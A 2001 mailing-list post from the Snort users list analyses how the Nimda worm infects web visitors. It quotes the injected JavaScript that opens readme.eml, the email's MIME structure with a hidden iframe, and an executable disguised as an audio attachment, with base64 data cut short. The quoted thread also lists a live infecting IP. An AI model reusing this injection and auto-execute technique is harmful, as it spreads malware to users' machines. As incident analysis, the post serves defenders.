Re: nimda

["Sean Wheeler" <S.Wheeler () netprotect ch>]

Figuring out how this is happening :

A user noticed this same effect while browsing the net, I jumped on a unix box and tried to figure out what was 
happening.

First downloaded the main html page : wget xxx.xxx.xxx.xxx bottom of the index.html reads :
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>

Grabbed the readme.eml :  wget xxx.xxx.xxx/readme.eml
and there she sits, the readme.exe inside the readme.eml

It seems the *.eml extention is associated with Outlook, and thus the readme.eml is processed by Outlook when the 
javascript is executed and the infection occurs just as if you had received it via e-mail.

Below it the fist portion of the readme.eml file :

MIME-Version: 1.0
Content-Type: multipart/related;
        type="multipart/alternative";
        boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
        boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
        name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
etc etc etc.......................

Pretty scary stuff !!

If this has been covered already sorry for the repetition, just got back from the chaos of international airports, have 
not got though all the mail yet.

Sean


  ----- Original Message ----- 
  From: Olensky, Sven 
  To: snort-users () lists sourceforge net 
  Sent: Tuesday, September 18, 2001 7:13 PM
  Subject: [Snort-users] nimda


  check this out http://208.193.197.48/

  thats one of the source IPs. opens a second window, offers readme.exe as download.

  jesus.
    -----Original Message-----
    From: snortlst snortlst [mailto:snortlst () hotmail com]
    Sent: Tuesday, September 18, 2001 12:13 PM
    To: snort-users () lists sourceforge net
    Subject: [Snort-users] General info


    I couldn't find the explanation for pretty simple questions on the snort site, so maybe you can clarify this:
    1. When you compare traffic to the rules what are the options - alerts are sent to syslog or database, or 
file,that's o.k., but can you for example drop connection if it conflicts with snort rules?What else can you do to 
malicious conenctions?
    2.I don't think mysql is an option for me, is ACID simplier to confiure than mysql?
    3. Can I generate HTML reports if I log to ACID?